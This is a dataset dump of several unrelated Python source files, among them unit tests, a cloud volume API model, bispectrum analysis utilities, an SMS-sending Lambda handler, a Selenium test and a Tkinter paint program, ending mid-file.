Command('start_entity', 5, 0),\n Command('stop_entity', 14, 0),\n Command('start_entity', 0, 1),\n Command('stop_entity', 4, 1),\n ])\n flattened = [(index, list(group)) for index, group in grouped]\n\n self.assertEqual(str(flattened), str([\n (0, [\n Command('start_text', 0),\n Command('start_inline_style', 0, 'ITALIC'),\n Command('start_entity', 0, 1),\n ]),\n (4, [\n Command('stop_inline_style', 4, 'ITALIC'),\n Command('stop_entity', 4, 1),\n ]),\n (5, [\n Command('start_entity', 5, 0),\n ]),\n (9, [\n Command('start_inline_style', 9, 'BOLD'),\n ]),\n (12, [\n Command('stop_inline_style', 12, 'BOLD'),\n ]),\n (14, [\n Command('stop_entity', 14, 0),\n ]),\n (19, [\n Command('stop_text', 19),\n ]),\n ]))\n\n def test_start_stop(self):\n self.assertEqual(str(Command.start_stop('abracadabra', 0, 5, 'shazam')), str([\n Command('start_abracadabra', 0, 'shazam'),\n Command('stop_abracadabra', 5, 'shazam'),\n ]))\n\n def test_from_ranges_empty(self):\n self.assertEqual(str(Command.from_ranges([], 'abracadabra', 'style')), str([]))\n\n def test_from_ranges_single(self):\n self.assertEqual(str(Command.from_ranges([\n {\n 'offset': 0,\n 'length': 4,\n 'style': 'shazam'\n }\n ], 'abracadabra', 'style')), str([\n Command('start_abracadabra', 0, 'shazam'),\n Command('stop_abracadabra', 4, 'shazam'),\n ]))\n\n def test_from_ranges_multiple(self):\n self.assertEqual(str(Command.from_ranges([\n {\n 'offset': 0,\n 'length': 4,\n 'style': 'shazam'\n },\n {\n 'offset': 9,\n 'length': 3,\n 'style': 'wazzum'\n }\n ], 'abracadabra', 'style')), str([\n Command('start_abracadabra', 0, 'shazam'),\n Command('stop_abracadabra', 4, 'shazam'),\n Command('start_abracadabra', 9, 'wazzum'),\n Command('stop_abracadabra', 12, 'wazzum'),\n ]))\n","sub_path":"tests/test_command.py","file_name":"test_command.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"477658825","text":"\n\nimport numpy as np\nfrom utils import _simulate_missing_data\nfrom riddle.models.mlp import MLP\nfrom utils import evaluate\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport time\nfrom sklearn.metrics import mean_squared_error\n\n\n\ndef main(input_file_path):\n letters = pd.read_csv(input_file_path, dtype='float32', delimiter=',')\n\n x = np.array(letters.drop(['letter'], 1))\n\n y = np.array(letters['letter'])\n\n x = x.tolist()\n y = y.tolist()\n\n x = _simulate_missing_data(x, prop_missing=0.2)\n\n x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.1, random_state=1)\n x_train, x_val, y_train, y_val = train_test_split(x_train, y_train, test_size=0.1, random_state=1)\n\n start = time.time()\n model = MLP(30, 26)\n model.train(x_train, y_train, x_val, y_val)\n y_probas = model.predict_proba(x_test)\n\n print(y_probas)\n y_pred = np.argmax(y_probas, axis=1)\n print(y_pred)\n\n runtime = time.time() - start\n out_dir = '/Users/ashiralam/riddle/_out_test/test_letter/'\n\n evaluate(y_test, y_probas, runtime, num_class=26,\n out_dir=out_dir)\n output_file_path = 'out.txt'\n with open(output_file_path, 'w') as f:\n print('Filename:', y_pred, file=f)\n\n\n print('Mean Squared Error: {:.4f}'.format(mean_squared_error(y_test, y_pred)))\n\n return output_file_path\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"data_cleaning/imputation/riddle/imputation.py","file_name":"imputation.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"239906116","text":"\"\"\"\nCopyright 2013 Rackspace\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nfrom cloudcafe.blockstorage.volumes_api.common.models.automarshalling import \\\n _VolumesAPIBaseListModel, _VolumesAPIBaseModel, _XMLDictionary\nfrom cloudcafe.blockstorage.volumes_api.common.models.automarshalling import \\\n CommonModelProperties\n\n\nclass VolumeResponse(CommonModelProperties, _VolumesAPIBaseModel):\n obj_model_key = 'volume'\n kwarg_map = {\n \"id_\": \"id\",\n \"size\": \"size\",\n \"volume_type\": \"volume_type\",\n \"name\": \"name\",\n \"description\": \"description\",\n \"metadata\": \"metadata\",\n \"bootable\": \"bootable\",\n \"availability_zone\": \"availability_zone\",\n \"snapshot_id\": \"snapshot_id\",\n \"attachments\": \"attachments\",\n \"links\": \"links\",\n \"created_at\": \"created_at\",\n \"status\": \"status\",\n \"source_volid\": \"source_volid\",\n \"image_ref\": \"imageRef\",\n \"volume_image_metadata\": \"volume_image_metadata\",\n \"os_vol_host_attr_host\": \"os-vol-host-attr:host\",\n \"os_vol_tenant_attr_tenant_id\": \"os-vol-tenant-attr:tenant_id\",\n \"os_vol_mig_status_attr_migstat\": \"os-vol-mig-status-attr:migstat\",\n \"os_vol_mig_status_attr_name_id\": \"os-vol-mig-status-attr:name_id\"}\n\n def __init__(\n self, id_=None, size=None, name=None, volume_type=None,\n description=None, metadata=None, availability_zone=None,\n snapshot_id=None, attachments=None, created_at=None, status=None,\n links=None, source_volid=None, os_vol_tenant_attr_tenant_id=None,\n os_vol_host_attr_host=None, bootable=None, image_ref=None,\n volume_image_metadata=None, os_vol_mig_status_attr_migstat=None,\n os_vol_mig_status_attr_name_id=None):\n\n super(VolumeResponse, self).__init__()\n self._name = None\n self._description = None\n self.id_ = id_\n self.size = size\n self.name = name\n self.description = description\n self.volume_type = volume_type\n self.availability_zone = availability_zone\n self.metadata = metadata or {}\n self.snapshot_id = snapshot_id\n self.bootable = bootable\n self.attachments = attachments or []\n self.created_at = created_at\n self.status = status\n self.links = links or []\n self.image_ref = image_ref\n self.source_volid = source_volid\n self.volume_image_metadata = volume_image_metadata\n self.os_vol_host_attr_host = os_vol_host_attr_host\n self.os_vol_tenant_attr_tenant_id = os_vol_tenant_attr_tenant_id\n self.os_vol_mig_status_attr_migstat = os_vol_mig_status_attr_migstat\n self.os_vol_mig_status_attr_name_id = os_vol_mig_status_attr_name_id\n\n @classmethod\n def _json_dict_to_obj(cls, json_dict):\n volume = cls._map_values_to_kwargs(json_dict)\n volume.attachments = _VolumeAttachmentsList._json_dict_to_obj(\n volume.attachments)\n volume.links = _LinksList._json_dict_to_obj(volume.links)\n return volume\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n kwargs = {}\n for local_kw, deserialized_obj_kw in cls.kwarg_map.iteritems():\n kwargs[local_kw] = element.get(deserialized_obj_kw)\n\n namespace_kwargs = {}\n namespace_kwargs[\"os_vol_host_attr_host\"] = \"host\"\n namespace_kwargs[\"os_vol_tenant_attr_tenant_id\"] = \"tenant_id\"\n namespace_kwargs[\"os_vol_mig_status_attr_migstat\"] = \"migstat\"\n namespace_kwargs[\"os_vol_mig_status_attr_name_id\"] = \"name_id\"\n\n for local_kw, expected_stripped_name in namespace_kwargs.iteritems():\n for element_name, element_value in element.items():\n _, _, stripped_element_name = str(element_name).rpartition('}')\n if expected_stripped_name == stripped_element_name:\n kwargs[local_kw] = element_value\n\n volume = cls(**kwargs)\n volume.metadata = _XMLDictionary._xml_ele_to_obj(element)\n volume.volume_image_metadata = _XMLDictionary._xml_ele_to_obj(\n element, 'volume_image_metadata')\n volume.attachments = _VolumeAttachmentsList._xml_ele_to_obj(element)\n volume.links = _LinksList._xml_ele_to_obj(element)\n return volume\n\n\nclass VolumeSnapshotResponse(CommonModelProperties, _VolumesAPIBaseModel):\n obj_model_key = 'snapshot'\n kwarg_map = {\n \"id_\": \"id\",\n \"volume_id\": \"volume_id\",\n \"name\": \"name\",\n \"description\": \"description\",\n \"status\": \"status\",\n \"size\": \"size\",\n \"created_at\": \"created_at\",\n \"metadata\": \"metadata\",\n \"os_extended_snapshot_attributes_project_id\":\n \"os-extended-snapshot-attributes:project_id\",\n \"os_extended_snapshot_attributes_progress\":\n \"os-extended-snapshot-attributes:progress\"}\n\n def __init__(\n self, id_=None, volume_id=None, name=None, description=None,\n status=None, size=None, created_at=None, metadata=None,\n os_extended_snapshot_attributes_project_id=None,\n os_extended_snapshot_attributes_progress=None):\n\n super(VolumeSnapshotResponse, self).__init__()\n self._name = None\n self._description = None\n self.id_ = id_\n self.volume_id = volume_id\n self.name = name\n self.description = description\n self.status = status\n self.size = size\n self.created_at = created_at\n self.metadata = metadata\n self.os_extended_snapshot_attributes_project_id = \\\n os_extended_snapshot_attributes_project_id\n self.os_extended_snapshot_attributes_progress = \\\n os_extended_snapshot_attributes_progress\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n kwargs = {}\n for local_kw, deserialized_obj_kw in cls.kwarg_map.iteritems():\n kwargs[local_kw] = element.get(deserialized_obj_kw)\n\n namespace_kwargs = {}\n namespace_kwargs[\n \"os_extended_snapshot_attributes_project_id\"] = \"project_id\"\n namespace_kwargs[\n \"os_extended_snapshot_attributes_progress\"] = \"progress\"\n\n for local_kw, expected_stripped_name in namespace_kwargs.iteritems():\n for element_name, element_value in element.items():\n _, _, stripped_element_name = str(element_name).rpartition('}')\n if expected_stripped_name == stripped_element_name:\n kwargs[local_kw] = element_value\n\n snapshot = cls(**kwargs)\n snapshot.metadata = _XMLDictionary._xml_ele_to_obj(element)\n return snapshot\n\n\nclass VolumeTypeResponse(_VolumesAPIBaseModel):\n obj_model_key = \"volume_type\"\n kwarg_map = {\n \"id_\": \"id\",\n \"name\": \"name\",\n \"extra_specs\": \"extra_specs\"}\n\n def __init__(self, id_=None, name=None, extra_specs=None):\n\n super(VolumeTypeResponse, self).__init__()\n self.id_ = id_\n self.name = name\n self.extra_specs = extra_specs\n\n @classmethod\n def _xml_ele_to_obj(cls, element):\n kwargs = {}\n for local_kw, deserialized_obj_kw in cls.kwarg_map.iteritems():\n kwargs[local_kw] = element.get(deserialized_obj_kw)\n volume_type_obj = cls(**kwargs)\n volume_type_obj.extra_specs = _XMLDictionary._xml_ele_to_obj(\n element, 'extra_specs')\n return volume_type_obj\n\n\nclass VolumeListResponse(_VolumesAPIBaseListModel):\n list_model_key = 'volumes'\n ObjectModel = VolumeResponse\n\n\nclass VolumeSnapshotListResponse(_VolumesAPIBaseListModel):\n list_model_key = 'snapshots'\n ObjectModel = VolumeSnapshotResponse\n\n\nclass VolumeTypeListResponse(_VolumesAPIBaseListModel):\n list_model_key = 'volume_types'\n ObjectModel = VolumeTypeResponse\n\n @classmethod\n def _xml_ele_to_obj(cls, xml_etree_element):\n obj_list = cls()\n for element in xml_etree_element:\n if element.tag.endswith(cls.ObjectModel.obj_model_key):\n obj_list.append(cls.ObjectModel._xml_ele_to_obj(element))\n return obj_list\n\n\nclass _VolumeAttachmentItem(_VolumesAPIBaseModel):\n kwarg_map = {\n \"id_\": \"id\",\n \"device\": \"device\",\n \"volume_id\": \"volume_id\",\n \"server_id\": \"server_id\"}\n\n def __init__(self, id_=None, device=None, server_id=None, volume_id=None):\n super(_VolumeAttachmentItem, self).__init__()\n self.id_ = id_\n self.device = device\n self.volume_id = volume_id\n self.server_id = server_id\n\n\nclass _VolumeAttachmentsList(_VolumesAPIBaseListModel):\n list_model_key = 'attachments'\n ObjectModel = _VolumeAttachmentItem\n\n\nclass _LinksItem(_VolumesAPIBaseModel):\n kwarg_map = {\n \"href\": \"href\",\n \"rel\": \"rel\"}\n\n def __init__(self, href=None, rel=None):\n super(_LinksItem, self).__init__()\n self.href = href\n self.rel = rel\n\n\nclass _LinksList(_VolumesAPIBaseListModel):\n list_model_key = 'links'\n ObjectModel = _LinksItem\n","sub_path":"cloudcafe/blockstorage/volumes_api/v2/models/responses.py","file_name":"responses.py","file_ext":"py","file_size_in_byte":9536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441427936","text":"import numpy as np\nimport bi_inout\n\n\ndef safe_inverse(arr):\n arr = arr.copy()\n bad_inds = np.where(arr == 0)\n arr[bad_inds] = 1\n arr = 1./arr\n arr[bad_inds] = 0\n return arr\n\n\ndef makeFFTGrid(shape, resolution=1.):\n \"\"\"\n Creates a grid in which each element is proportional to the\n distance from the point to the origin (with wrapping).\n The distance between neighboring grid squares is 1/(n*resolution).\n \n >>> utils.math.makeFFTGrid(10, 2.)\n array([ 0. , 0.05, 0.1 , 0.15, 0.2 , 0.25, -0.2 , -0.15, -0.1 , -0.05])\n \n >>> utils.math.makeFFTGrid([5,5], 1.)\n array([[ 0. , 0.2 , 0.4 , 0.4 , 0.2 ],\n [ 0.2 , 0.28284271, 0.4472136 , 0.4472136 , 0.28284271],\n [ 0.4 , 0.4472136 , 0.56568542, 0.56568542, 0.4472136 ],\n [ 0.4 , 0.4472136 , 0.56568542, 0.56568542, 0.4472136 ],\n [ 0.2 , 0.28284271, 0.4472136 , 0.4472136 , 0.28284271]])\n \"\"\"\n # Make sure the input \"shape\" is an iterable.\n try:\n len(shape)\n except TypeError:\n shape = [shape]\n\n # Create a set of coordinates. We can then find the \"distance\" of\n # each point from the origin.\n slices = [slice( -np.floor((dim-1)/2.), np.ceil((dim-1)/2.)+1 ) for dim in shape]\n coordinates = np.mgrid[slices]\n\n # Get the correct normalization - divide each dimension by\n # its size and by the overall resolution.\n for index, dim_size in enumerate(shape):\n coordinates[index] /= (dim_size*resolution)\n\n # If we want a 1D array, then we already have what we want.\n # Don't apply the square and square-root, so that we can\n # keep the negative signs.\n if len(shape)!=1:\n grid = np.sqrt( np.sum( coordinates**2, axis=0 ) )\n else:\n grid = coordinates[0]\n \n for index, dim_size in enumerate(shape):\n grid = np.roll(grid, int(np.ceil((dim_size-1)/2.)+1), axis=index)\n\n return grid\n\ndef makeEllGrid(shape, resolution=1.):\n \"\"\"\n OUTPUT \n 2.*np.pi*makeFFTGrid(shape=shape, resolution=resolution)\n \"\"\"\n return 2.*np.pi*makeFFTGrid(shape=shape, resolution=resolution)\n\n\n\ndef get_bispec_and_variance_one_field( file_names):\n loaded_files = map(bi_inout.load_bispec_output_hdf5, file_names)\n\n #check that the format is right\n fields_to_check = ['field_name', 'bands', 'grid_bands']\n for i in range(1,len(loaded_files)):\n for fc in fields_to_check:\n if( np.any(loaded_files[0][fc] != loaded_files[i][fc]) ):\n raise RuntimeError(\"%s is not the same for some loaded files\"%(fc))\n bispecs = []\n tags = []\n for lf in loaded_files:\n bispecs += list(lf['bispec'])\n tags += list(lf['bispec_tag'])\n #check that there in one real value\n\n print( tags )\n\n assert(tags.count('real') == 1)\n real_ind = tags.index('real')\n\n real_bs = bispecs[real_ind]\n real_wgts = loaded_files[real_ind]['bispec_weight']\n\n bispecs.pop(real_ind)\n barr = np.array(bispecs)\n\n return real_bs, np.var(barr, axis = 0), real_wgts\n\ndef combine_bispecs_and_variances(bispec_vals, variances):\n wgts = map(get_bi_field_weight, variances)\n wsum = sum(wgts)\n wgts = map(lambda w: w/wsum, wgts)\n #weighted mean\n wmean = sum(map(lambda i: wgts[i] * bispec_vals[i], range(len(bispec_vals))))\n\n #weighted variance\n wvar = sum(map(lambda i: wgts[i]**2 * variances[i], range(len(bispec_vals))))\n return wmean, wvar\n\n\n\ndef get_bispec_chisq_diff(b0, b_var0, b1, b_var1):\n bad_inds = np.where(b_var0 == 0)\n n_vals = np.size(b0) - np.size(bad_inds)/3\n\n sq_diff = (b0-b1)**2/(b_var0+b_var1)\n sq_diff[bad_inds] = 0\n\n #import pdb; pdb.set_trace()\n\n chisq = np.sum(sq_diff)\n red_chisq = chisq/n_vals\n return chisq, red_chisq\n\n\n\ndef get_bi_field_weight(var_matrix):\n good_inds = np.where(var_matrix != 0)\n return np.median( 1.0/(var_matrix[good_inds]))\n\n\nif __name__ == '__main__':\n import argparse, bi_inout\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--input_files', nargs='+', help='bork', required=True)\n parser.add_argument('--output_file', help='bork', required=True)\n parser.add_argument('--combining_fields', action='store_true')\n #parser.add_argument('--fill_in_initial_ellvec', action='store_true')\n\n args = parser.parse_args()\n if args.combining_fields:\n bvals = []\n variances = []\n field_dics = map(bi_inout.load_bispec_field_output_hdf5, args.input_files)\n for fdic in field_dics:\n bvals.append(fdic['bispec'])\n variances.append(fdic['bispec_variance'])\n fvals = field_dics[0]\n\n bmean, bvar = combine_bispecs_and_variances(bvals, variances)\n bi_inout.store_bispec_field_output_hdf5(args.output_file, bmean, bvar, bvar*0, \"all_of_them\", \n fvals['bands'], fvals['grid_bands'], fvals['bispec_tag'], \n fvals['ell_vec'], fvals['delta_ell'])\n \n\n else:\n bi, var, wgts = get_bispec_and_variance_one_field(args.input_files)\n fvals = bi_inout.load_bispec_output_hdf5(args.input_files[0])\n print( 'storing output' )\n bi_inout.store_bispec_field_output_hdf5(args.output_file, bi, var, wgts, fvals['field_name'], \n fvals['bands'], fvals['grid_bands'], fvals['bispec_tag'], \n fvals['ell_vec'], fvals['delta_ell'])\n \n \n","sub_path":"mapspectra/python/bi_anal_utils.py","file_name":"bi_anal_utils.py","file_ext":"py","file_size_in_byte":5567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"271503058","text":"import boto3\n\ndef lambda_handler(event, context):\n\n client = boto3.client(\"sns\")\n\n topic = client.create_topic(Name=event['Topic'])\n topic_arn = topic['TopicArn']\n\n for number in event['Numbers']:\n client.subscribe(\n TopicArn=topic_arn,\n Protocol='sms',\n Endpoint=number\n )\n\n client.publish(Message=event['Message'], TopicArn=topic_arn)\n","sub_path":"lambda_code/sms-send/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"131145390","text":"from selenium import webdriver\nimport unittest\nimport time\n\nclass MyTest(unittest.TestCase):\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.implicitly_wait(10)\n self.base_url='http://www.youdao.com'\n def test_youdao(self):\n driver=self.driver\n driver.get(self.base_url)\n driver.find_element_by_xpath('//*[@id=\"translateContent\"]').click()\n driver.find_element_by_xpath('//*[@id=\"translateContent\"]').send_keys('webdriver')\n driver.find_element_by_xpath('//*[@id=\"form\"]/button').click()\n time.sleep(2)\n title=driver.title\n self.assertEqual(title,u'【webdriver】什么意思_英语webdriver的翻译_音标_读音_用法_例句_在线翻译_有道词典')\n def tearDown(self):\n pass\nif __name__=='__main__':\n unittest.main()\n\n","sub_path":"unit/test_youdao.py","file_name":"test_youdao.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"150278858","text":"data = list(map(int, input(\"enter x1,y1,x2,y2,x3,y3,x4,y4: valuse: \").split()))\nx1, y1, x2, y2, x3, y3, x4, y4 = data\n\n# print(x1,y1,x2,y2,x3,y3,x4,y4)\n\npq = [[x1, y1], [x2, y2]]\nrs = [[x3, y3], [x4, y4]]\n# print(pq[0][1], rs)\n\n\ndef slope(point: list):\n up = point[1][1] - point[0][1]\n down = point[1][0] - point[0][0]\n if down == 0:\n return \"inf\"\n else:\n mid = up / down\n return mid\n\n\nif round(slope(pq)) == round(slope(rs)):\n print(\"lines are parallel\")\nelse:\n print(\"not parallel\")\n","sub_path":"q43.py","file_name":"q43.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"382634795","text":"\"\"\"\nzeroterm is a light weight terminal allowing both:\n* lines written one after another (normal terminal/console behaviour)\n* fixed position text\n\nNote: Requires an ANSI terminal. For Windows 7, please download https://github.com/downloads/adoxa/ansicon/ansi160.zip and run ansicon.exe -i to install it.\n\"\"\"\n\nfrom sys import stdout\nimport time\n\nclass zeroterm:\n def __init__(self, nrow=10, ncol=200): # nrow, ncol determines the size of the scrolling (=normal terminal behaviour) part of the screen\n stdout.write(\"\\x1b[2J\") # clear screen\n self.nrow = nrow\n self.ncol = ncol\n self.buf = []\n\n def write(self, s, x=None, y=None): # if no x,y specified, normal console behaviour\n if x is not None and y is not None: # if x,y specified, fixed text position\n self.movepos(x,y)\n print (s)\n else:\n if len(self.buf) < self.nrow:\n self.buf.append(s)\n else:\n self.buf[:-1] = self.buf[1:]\n self.buf[-1] = s\n\n for i, r in enumerate(self.buf):\n self.movepos(i+1,0)\n print ( r[:self.ncol].ljust(self.ncol) )\n\n def movepos(self, row, col):\n stdout.write(\"\\x1b[%d;%dH\" % (row, col))\n# end class zeroterm\n","sub_path":"Baixar Musicas/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"220842233","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport concepts.managers\nimport djorm_pgarray.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('concepts', '0001_initial'),\n ('core_media', '0004_add_archived_and_prune'),\n ('quizwhiz', '0002_add_edumetadata'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='quiz',\n name='introduction',\n field=models.TextField(default=b'', verbose_name='introduction', blank=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='quiz',\n name='key_image',\n field=models.ForeignKey(verbose_name='key_image', blank=True, to='core_media.NGPhoto', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='quiz',\n name='concept_items',\n field=concepts.managers.ConceptManager(to='concepts.Concept', through='concepts.ConceptItem', help_text='Press return to complete each tag.', verbose_name='Concepts'),\n preserve_default=True,\n ),\n migrations.AlterField(\n model_name='question',\n name='answers',\n field=djorm_pgarray.fields.TextArrayField(help_text=b'Press return to save a new answer. Double click an existing answer to edit. Click the circle next to the correct answer.', dbtype='text'),\n preserve_default=True,\n ),\n ]\n","sub_path":"quizwhiz/migrations/0003_add_intro_key_image_concept.py","file_name":"0003_add_intro_key_image_concept.py","file_ext":"py","file_size_in_byte":1534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"140719928","text":"# Your code here\nwith open(\"applications/histo/robin.txt\") as f:\n s = f.read()\n\nimport re #import regex module\ndef hist(s):\n counts = {}\n s = s.lower()\n # get rid of punctuation\n s = re.sub(r'[^\\w\\s]','', s) #regular expression replacement with re.sub\n # iterate through each word in the sentence using split\n for word in s.split():\n # if it's the first time seeing the key\n if word not in counts:\n # set the value to 1\n counts[word] = 1\n # if it's a duplicate key\n else:\n # add 1 to the value\n counts[word] += 1\n # sort dictionary\n list_of_items = list(counts.items())\n list_of_items.sort(key = lambda x: -x[1])\n # iterate through each tuple in the list to construct histogram\n for word, count in list_of_items:\n print(f\"{word:<15} {count * '#'}\")\n\nhist(s)\n","sub_path":"applications/histo/histo.py","file_name":"histo.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"23518883","text":"import sys\nimport ldtp\nimport Image\nimport ImageChops\nfrom commandes_bases import *\n\nconnecter()\n\ntraiterFiche()\n\nfenetre = \"*Traitement d'une fiche de maintenance*\"\nldtp.waittillguiexist(fenetre)\n\nldtp.mouseleftclick(fenetre, 'txtFiche#13')\nldtp.keypress('')\nldtp.keypress('a')\nldtp.keyrelease('')\nldtp.keypress('')\nldtp.keyrelease('')\nldtp.enterstring(fenetre, 'txtFiche#13', 'allo mon grand')\nldtp.click(fenetre, 'btnCancel')\n\nldtp.click('*Gestion de dossiers*', 'btnTraiter')\nldtp.waittillguiexist(fenetre)\n\ncoordinate = ldtp.getwindowsize(fenetre)\nif (len(sys.argv) > 1) and (sys.argv[1] == 'origin'):\n\tldtp.imagecapture(fenetre, 'images/traiter_fiche_commentaire_basse_origin.png',\n coordinate[0], coordinate[1], coordinate[2], coordinate[3])\nelse:\n ldtp.imagecapture(fenetre, 'images/traiter_fiche_commentaire_basse.png',\n coordinate[0], coordinate[1], coordinate[2], coordinate[3])\n im1 = Image.open(\"images/traiter_fiche_commentaire_basse.png\")\n im2 = Image.open(\"images/traiter_fiche_commentaire_basse_origin.png\")\n diff = ImageChops.difference(im2, im1)\n if diff.getbbox():\n print(\"Erreur possible dans 'Traitement fiche test: commentaire basse'\")\n\nldtp.click(fenetre, 'btnSaveEnter')\nfermer()\n","sub_path":"tests/traiter_fiche_annuler.py","file_name":"traiter_fiche_annuler.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"579162160","text":"from tkinter import *\r\n\r\n\r\n# PROCEDURES\r\n######################################################################\r\n\r\n# Shapes - different procedure for each shape that you choose\r\ndef draw_shape(event):\r\n x = event.x\r\n y = event.y\r\n d = brushVar.get()\r\n width = widthVar.get()\r\n height = heightVar.get()\r\n\r\n if shapeVar.get() == 1:\r\n cv.bind(\"\", draw_shape)\r\n cv.create_oval(x-d, y-d, x+d, y+d, fill=colourVar.get(), outline=colourVar.get())\r\n if shapeVar.get() == 4:\r\n cv.unbind(\"\")\r\n cv.create_text(x, y, text=customText.get(), fill=colourVar.get(), font=f'Times, {fontVar.get()}')\r\n elif fillVar.get() == 1:\r\n if shapeVar.get() == 2:\r\n cv.unbind(\"\")\r\n cv.create_rectangle(x-width, y-height, x+width, y+height, outline=colourVar.get())\r\n elif shapeVar.get() == 3:\r\n cv.unbind(\"\")\r\n cv.create_oval(x-width, y-height, x+width, y+height, outline=colourVar.get())\r\n elif fillVar.get() == 0:\r\n if shapeVar.get() == 2:\r\n cv.unbind(\"\")\r\n cv.create_rectangle(x-width, y-height, x+width, y+height, fill=colourVar.get(), outline=colourVar.get())\r\n elif shapeVar.get() == 3:\r\n cv.unbind(\"\")\r\n cv.create_oval(x-width, y-height, x+width, y+height, fill=colourVar.get(), outline=colourVar.get())\r\n\r\n\r\ndef show_settings():\r\n if shapeVar.get() == 2 or shapeVar.get() == 3:\r\n shapeSettingsFrame.grid(row=4, column=3)\r\n widthLabel.grid(row=1, column=1, padx=5, pady=(5, 2), sticky=W)\r\n widthSpin.grid(row=2, column=1, padx=5, pady=(0, 5))\r\n heightLabel.grid(row=3, column=1, padx=5, pady=(5, 2), sticky=W)\r\n heightSpin.grid(row=4, column=1, padx=5, pady=(0, 5))\r\n fillCheck.grid(row=5, column=3, padx=20, sticky=NW)\r\n changeTextButton.grid_remove()\r\n fontSpin.grid_remove()\r\n brushSize.grid_remove()\r\n elif shapeVar.get() == 4:\r\n shapeSettingsFrame.grid(row=4, column=3)\r\n changeTextButton.grid(row=1, column=1, padx=10, pady=(10, 5))\r\n fontSpin.grid(row=2, column=1, padx=10, pady=(5, 10))\r\n widthLabel.grid_remove()\r\n widthSpin.grid_remove()\r\n heightLabel.grid_remove()\r\n heightSpin.grid_remove()\r\n brushSize.grid_remove()\r\n fillCheck.grid_remove()\r\n else:\r\n shapeSettingsFrame.grid_remove()\r\n widthLabel.grid_remove()\r\n widthSpin.grid_remove()\r\n heightLabel.grid_remove()\r\n heightSpin.grid_remove()\r\n changeTextButton.grid_remove()\r\n fontSpin.grid_remove()\r\n fillCheck.grid_remove()\r\n brushSize.grid(row=1, rowspan=2, column=3)\r\n\r\n\r\n# Brush Customization - change brush size and preset colour (RGB Window for custom colours)\r\ndef change_brush_colour(c):\r\n colourVar.set(c)\r\n\r\n\r\n# Change Text Window - top-level widget used to customize text that is placed on the canvas\r\ndef change_text():\r\n text_var = create_change_text_window()\r\n\r\n customText.set(text_var)\r\n\r\n\r\ndef create_change_text_window():\r\n t = Toplevel()\r\n t.title(\"Change Text\")\r\n\r\n text_var = StringVar()\r\n text_entry = Entry(t, width=100, textvariable=text_var)\r\n\r\n apply = Button(t, text=\"Apply\", command=t.destroy)\r\n\r\n text_entry.grid(row=1, column=1, padx=20, pady=(20, 5))\r\n apply.grid(row=2, column=1, pady=(5, 20))\r\n\r\n t.wait_window()\r\n\r\n text = text_var.get()\r\n\r\n return text\r\n\r\n\r\n# Resize Canvas Window - top-level widget used to resize the canvas\r\ndef resize_canvas():\r\n dim = create_resize_window()\r\n\r\n cv.config(width=dim[0], height=dim[1])\r\n\r\n\r\ndef create_resize_window():\r\n t = Toplevel()\r\n t.title(\"Resize Canvas\")\r\n\r\n width_label = Label(t, text=\"Width\")\r\n height_label = Label(t, text=\"Height\")\r\n\r\n w_var = IntVar()\r\n w_var.set(1100)\r\n width_spin = Spinbox(t, width=10, textvariable=w_var, from_=50, to=1100)\r\n\r\n h_var = IntVar()\r\n h_var.set(500)\r\n height_spin = Spinbox(t, width=10, textvariable=h_var, from_=50, to=500)\r\n\r\n apply = Button(t, text=\"Apply\", command=t.destroy)\r\n\r\n t.grid()\r\n width_label.grid(row=1, column=1, padx=(70, 5), pady=(10, 5), sticky=E)\r\n width_spin.grid(row=1, column=2, padx=(0, 70), pady=(10, 5))\r\n height_label.grid(row=2, column=1, padx=(70, 5), pady=(5, 0), sticky=E)\r\n height_spin.grid(row=2, column=2, padx=(0, 70), pady=(5, 0))\r\n apply.grid(row=3, column=1, columnspan=2, pady=10)\r\n\r\n t.wait_window()\r\n\r\n dimensions = [w_var.get(), h_var.get()]\r\n\r\n return dimensions\r\n\r\n\r\n# RGB Window - top-level widget used to create/use custom colours\r\ndef more_colours():\r\n custom_colour = create_rgb_window()\r\n\r\n colourVar.set(custom_colour.get())\r\n\r\n\r\ndef 